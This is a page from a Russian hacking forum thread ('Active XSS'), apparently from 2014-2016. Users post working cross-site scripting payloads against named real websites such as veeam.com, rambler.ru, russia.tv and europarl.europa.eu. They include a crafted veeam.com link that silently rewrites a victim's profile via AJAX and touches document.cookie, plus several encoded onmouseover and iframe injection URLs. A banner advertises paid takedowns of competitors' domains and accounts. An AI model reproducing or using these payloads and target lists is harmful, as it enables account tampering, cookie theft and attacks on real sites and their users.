Активные Xss

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Активные Xss

Страница 53 из 54

« Первая

Опции темы

Поиск в этой теме

Опции просмотра

#521

08.08.2014, 11:05

OxoTnik

Постоянный

Регистрация: 10.06.2011

Сообщений: 939

С нами: 7854806

Репутация: 173

http://www.odnako.org/

тиц 1600

РУ трафика 100К

Создать блог

уязвимый параметр превью

#522

31.01.2015, 04:48

teh

Познающий

Регистрация: 02.12.2010

Сообщений: 79

С нами: 8128406

Репутация: -2

russia.tv

анктивная xss в поле имя и фамилия, при изменении их, в аккаунте.

#523

27.05.2015, 17:58

kingbeef

Новичок

Регистрация: 08.04.2010

Сообщений: 1

С нами: 8469890

Репутация: 0

aeterna.qip.ru

Создаем тест.

Название теста

">alert()

#524

30.08.2015, 23:51

Siqvik

Новичок

Регистрация: 09.08.2015

Сообщений: 4

С нами: 5664566

Репутация: 0

Вот

https://web.pechkin-mail.ru/

Форма регистрации. Вроде бы все поля =)

[CODE]
">alert()

Код:

#525

08.10.2015, 11:20

st1x0

Новичок

Регистрация: 23.05.2015

Сообщений: 9

С нами: 5776886

Репутация: 1

Была найдена случайно в поле поиске книг XSS

Прямая ссылка и XSS:

europarl.europa.eu/100books/en/list.html

Код:

">xss vuln found

joinup.ec.europa.eu/svn/

Весьма интересна)

#526

27.11.2015, 23:51

dejaview

Новичок

Регистрация: 27.11.2015

Сообщений: 1

С нами: 5506166

Репутация: 0

тиц/пр:550/6

url:https://www.veeam.com/account-edit-profile.html

Код:

alert(123);

Уязвимое поле - Title, но через инпут не записать, так как валидация. XSRF тоже не провести, так как xmlhttprequest.

Так что, если сам себе - подменяем запрос. Ну, а злоумышленник может записать жертве через пассивку -

Код:

https://www.veeam.com/inj.html";a="script";$.ajax(%7Btype:"POST",url:"/change_field/",data:"val=injectedalert(document.cookie);%7Cjob_description%7CR%2CSymbol%2CMax",dataType:"json",async:!1%7D);window.location="/account-edit-profile.html"

#527

14.01.2016, 13:14

st1x0

Новичок

Регистрация: 23.05.2015

Сообщений: 9

С нами: 5776886

Репутация: 1

Выложу несколько сайтов, может кому и пригодится. Ведь на рамблере молчат значит все равно на багу.

Код:

http://nova.rambler.ru/search?query=%3Cinput%20type%3D%22text%22%20value%3D%60%60%20%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX%3C%2Fdiv%3E&filter=%3Cinput%20value=%3C%3E%3Ciframe/src=javascript:confirm%281%29%3E

Код:

http://www.rfbr.ru/rffi/ru/search/?query=%C6%F3%F0%3Cinput+type%3D%22text%22+value%3D%60%60+%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX%3C%2Fdiv%3E%E1%E8%ED%E0

Код:

http://www.muztorg.ru/search/?query=%3Cinput+type%3D%22text%22+value%3D%60%60+%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX%3C%2Fdiv%3E

Код:

http://www.mcx.ru/fts/search?query=%3Cinput+type%3D%22text%22+value%3D%60%60+%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX%3C%2Fdiv%3E

#528

14.01.2016, 13:19

st1x0

Новичок

Регистрация: 23.05.2015

Сообщений: 9

С нами: 5776886

Репутация: 1

Также есть и на bing.com/translate но кто скажет эта уязвимость или фича движка??? тот ее и заберет.

#529

14.01.2016, 16:11

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

Цитата:

Сообщение от st1x0

↑
Также есть и на bing.com/translate но кто скажет эта уязвимость или фича движка??? тот ее и заберет.

это песочница, там нет пользовательских данных

#530

06.02.2016, 10:20

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

С нами: 10095779

Репутация: 137

http://www.cy-pr.com/tools/metatags/

Уязвимы все поля формы.

Страница 53 из 54

« Первая

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss для новичков	Micr0b	Уязвимости	79	06.07.2018 22:05
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
mylivepage.ru активные XSS	__XT__	Уязвимости	3	23.12.2006 14:31

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход